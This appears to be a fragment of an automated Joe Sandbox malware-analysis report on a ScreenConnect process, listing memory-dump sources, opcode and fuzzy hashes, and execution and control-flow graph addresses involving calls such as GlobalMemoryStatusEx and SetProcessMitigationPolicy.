                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 8279a0ed33ece776b989a5be1b1cdd669da0659c91c9cad99b43a3fb397ecbd5
                                                                                                                                                                                                                  • Instruction ID: fd2d56f9faf4503935d96097646a37ac80b2d8b780112cb690f3e5b385d72ceb
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8279a0ed33ece776b989a5be1b1cdd669da0659c91c9cad99b43a3fb397ecbd5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37017611A0EC980FDF95567C0829AB03FD1DF6A204B0D00EAD408CF1F3D80CD8498380
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 1519755670f4f1e397b5592a8585dfb2b18dba1a46c6e22cfaea7dbbd00b8601
                                                                                                                                                                                                                  • Instruction ID: 349ede94ae8bacb00e375449cd65f0896b20e6752c96674037459650135f67a6
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1519755670f4f1e397b5592a8585dfb2b18dba1a46c6e22cfaea7dbbd00b8601
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4DE09221A1EEA90FD766976C58695617FE0EB6630070A01DBC489CB1F3DC19DD85C381
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 404e6ad3b8721183551faa4c0053dc9572a1947ba27454a192f5748f5488abad
                                                                                                                                                                                                                  • Instruction ID: 750b4fbdcbe9d74507b8caab7d2a8e65abb363c38eae6c65d359395453db34aa
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 404e6ad3b8721183551faa4c0053dc9572a1947ba27454a192f5748f5488abad
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1F0303540D68C5FCB42DB68D4659E5BF70FE16325B0901CBE059CF062E7219A55CB82
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 651aea90582dc1eeb9288ebc3b8be45d0b6743d91f2bea8c96e14f7a4364c76b
                                                                                                                                                                                                                  • Instruction ID: b1651b6a29c8ab215861b41dd51d90024a9d7079da6163b2ba0dec46ad811d7b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 651aea90582dc1eeb9288ebc3b8be45d0b6743d91f2bea8c96e14f7a4364c76b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15E0DF20A1EC1D0FDBA5A66CA068AA53790EF2431870601EAD408CB1F6D814CD8583C0
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 07190eec911ab1e4795433d9f5c772b1ffe677b9f89517658dd8b84efc2687c7
                                                                                                                                                                                                                  • Instruction ID: b7f76ccf3a0ea6ff9d45e03afa7a4a47c9d342f5e416b296aca3a2a17cbf722b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07190eec911ab1e4795433d9f5c772b1ffe677b9f89517658dd8b84efc2687c7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7E04F3150991C9FCB15EB68E455CEA7764EF15318B054197E00EC70A2DA22A954CBC1
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: c3413e36f6bcc67ec7d87e429a4b96c53a2ff8da3548c24b0d6f49a413158296
                                                                                                                                                                                                                  • Instruction ID: 4e86661fab00f4024d0b43d2eb023e147ee772667763cecd3c2bdd87a8b582c6
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3413e36f6bcc67ec7d87e429a4b96c53a2ff8da3548c24b0d6f49a413158296
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28E08C25B4EA0B42FB7C32B568A23B5A891AF05309F4A407ED41DC15E9DC6C9E819152
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 4576f083b421b730865e9f6af20a6b4708d1318262a2a8e8d88969ab6bd7dadf
                                                                                                                                                                                                                  • Instruction ID: 7804c7b8cd42758bdd64618b717e09cd2264590f0e247709172f4c7e19bcd131
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4576f083b421b730865e9f6af20a6b4708d1318262a2a8e8d88969ab6bd7dadf
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDD0A743B5AC0D0BE5B4A65D34112F402C3E7D86A4B860073D50DC72EADC19ADC20780
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 49e98579236f67fda3ad1d02814725d4cf80b0324f5bd8e081a4791b18c58a08
                                                                                                                                                                                                                  • Instruction ID: 7666abcd716fb83f3a66d63f4f60fb5aa1a6417093072836d240c84cfbbbafd2
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49e98579236f67fda3ad1d02814725d4cf80b0324f5bd8e081a4791b18c58a08
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34C09B10F1B94E46F264EBA584B17BD1153FF8C609F964435D00DC31E6CD3C67016645
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 0f83e2d0c3d7cea83cd36b56dc91d20c34eacba4b5a54dba9ee974d8d0d571de
                                                                                                                                                                                                                  • Instruction ID: 856ab7d1b1e8f3f7197c6920114dfa4e6c603a004ebc61368b519c7b7baec459
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f83e2d0c3d7cea83cd36b56dc91d20c34eacba4b5a54dba9ee974d8d0d571de
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81A00240F0FD1E85E0B5E6D6406177D00425F4DA08F624135D00DC21F6CD2C6B422297

                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                  Execution Coverage:12.8%
                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                  Total number of Nodes:10
                                                                                                                                                                                                                  Total number of Limit Nodes:2
                                                                                                                                                                                                                  execution_graph 15567 7ffd9bbb8dbc 15568 7ffd9bbb8dbf 15567->15568 15569 7ffd9bbb8f39 GlobalMemoryStatusEx 15568->15569 15571 7ffd9bbb8e98 15568->15571 15570 7ffd9bbb8f65 15569->15570 15562 7ffd9b8a8014 15564 7ffd9b8a801d 15562->15564 15563 7ffd9b8a8082 15564->15563 15565 7ffd9b8a80f6 SetProcessMitigationPolicy 15564->15565 15566 7ffd9b8a8152 15565->15566

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 41 7ffd9bbb8dbc-7ffd9bbb8e0a 45 7ffd9bbb8e0c-7ffd9bbb8e35 41->45 46 7ffd9bbb8e54-7ffd9bbb8e66 41->46 48 7ffd9bbb8e37-7ffd9bbb8e3a 45->48 49 7ffd9bbb8e8e 45->49 50 7ffd9bbb8e68-7ffd9bbb8e6d 46->50 51 7ffd9bbb8ee2-7ffd9bbb8eec 46->51 52 7ffd9bbb8e3c-7ffd9bbb8e3e 48->52 53 7ffd9bbb8ebb-7ffd9bbb8ebf 48->53 54 7ffd9bbb8e8f 49->54 55 7ffd9bbb8e6f-7ffd9bbb8e71 50->55 56 7ffd9bbb8eee-7ffd9bbb8eef 50->56 57 7ffd9bbb8eed 51->57 58 7ffd9bbb8eba 52->58 59 7ffd9bbb8e40 52->59 78 7ffd9bbb8ec0 53->78 60 7ffd9bbb8f0b-7ffd9bbb8f0e 54->60 61 7ffd9bbb8e90 54->61 55->57 64 7ffd9bbb8e73-7ffd9bbb8e77 55->64 65 7ffd9bbb8f39-7ffd9bbb8f63 GlobalMemoryStatusEx 56->65 66 7ffd9bbb8ef0-7ffd9bbb8ef1 56->66 57->56 58->53 68 7ffd9bbb8e83 59->68 69 7ffd9bbb8e42-7ffd9bbb8e44 59->69 62 7ffd9bbb8f11-7ffd9bbb8f37 60->62 61->62 63 7ffd9bbb8e91 61->63 62->65 70 7ffd9bbb8ed3-7ffd9bbb8edf 63->70 71 7ffd9bbb8e92-7ffd9bbb8e96 63->71 74 7ffd9bbb8e79 64->74 75 7ffd9bbb8ef3-7ffd9bbb8ef8 64->75 72 7ffd9bbb8f65 65->72 73 7ffd9bbb8f6b-7ffd9bbb8f92 65->73 66->75 76 7ffd9bbb8e85 68->76 77 7ffd9bbb8eff-7ffd9bbb8f03 68->77 69->78 79 7ffd9bbb8e46 69->79 70->51 82 7ffd9bbb8f08-7ffd9bbb8f0a 71->82 83 7ffd9bbb8e98-7ffd9bbb8eb9 71->83 72->73 74->53 85 7ffd9bbb8e7b-7ffd9bbb8e7d 74->85 86 7ffd9bbb8ef9-7ffd9bbb8efe 75->86 87 7ffd9bbb8ec7-7ffd9bbb8ec9 76->87 88 7ffd9bbb8e86-7ffd9bbb8e87 76->88 89 7ffd9bbb8f05-7ffd9bbb8f06 77->89 90 7ffd9bbb8e48-7ffd9bbb8e4a 79->90 91 7ffd9bbb8e89 79->91 82->60 83->58 85->86 92 7ffd9bbb8e7f-7ffd9bbb8e81 85->92 86->77 94 7ffd9bbb8ecb-7ffd9bbb8ece 87->94 95 7ffd9bbb8ecf 87->95 88->91 89->82 96 7ffd9bbb8ec6 90->96 97 7ffd9bbb8e4c 90->97 91->89 93 7ffd9bbb8e8b-7ffd9bbb8e8d 91->93 92->68 93->49 94->95 99 7ffd9bbb8ed2 95->99 100 7ffd9bbb8ed1 95->100 96->87 97->54 101 7ffd9bbb8e4e-7ffd9bbb8e53 97->101 99->70 100->99 101->46
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000D.00000002.2026239969.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: b046db56febb43373c8ed1d2a43c6f7c7a451e6277b4adf896187af28949dc87
                                                                                                                                                                                                                  • Instruction ID: 7cff722a925e499518ce5f7c0f19e42f5f3342258d71204ca5c953a372076a91
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b046db56febb43373c8ed1d2a43c6f7c7a451e6277b4adf896187af28949dc87
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD715831E0E69D4FE771CBA88C256BA7FE0FF56314F0541BAD08CC75E2DA64690A8B41

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000D.00000002.2024153996.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b8a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                                                                                  • Opcode ID: 0c9ac84724606f768ec77f574eb49a04914c1869d51a1910754932b32a74a273
                                                                                                                                                                                                                  • Instruction ID: eb89acd12957c0e7364faf5436171b0fbb49feb3e90022ca7a844afe76d4c63d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c9ac84724606f768ec77f574eb49a04914c1869d51a1910754932b32a74a273
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70413B31D0DB584FDB28AFA8984A5E97BE0EF59310F04417FE449C3192DF78A946CBA1

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 120 7ffd9b8a3aa2-7ffd9b8a80ef 122 7ffd9b8a80f6-7ffd9b8a8150 SetProcessMitigationPolicy 120->122 123 7ffd9b8a8158-7ffd9b8a8187 122->123 124 7ffd9b8a8152 122->124 124->123
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000D.00000002.2024153996.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b8a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                                                                                  • Opcode ID: fb5ae72f5f54e9e658536393f6d5070e434499de52b9c7863d1cddb885256adf
                                                                                                                                                                                                                  • Instruction ID: 15bf649387bca3f4f765936368199400414f4dcb5d086abc185e5f9557ca91e9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb5ae72f5f54e9e658536393f6d5070e434499de52b9c7863d1cddb885256adf
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E21A771918B188FDB28AF9D9C4AAF97BE0EB59711F00412EE049D3251DB74B8468B91